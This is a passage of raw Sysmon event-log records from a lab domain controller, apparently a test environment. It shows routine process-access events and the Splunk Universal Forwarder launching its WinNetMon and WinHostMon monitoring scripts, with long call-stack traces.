Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.700{733EE690-3E0E-5F80-6000-000000007F01}3824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-5F00-000000007F01}4068C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-5F00-000000007F01}4068C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.588{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-5F00-000000007F01}4068C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.592{733EE690-3E0E-5F80-5F00-000000007F01}4068C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-5E00-000000007F01}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-5E00-000000007F01}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.479{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-5E00-000000007F01}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program 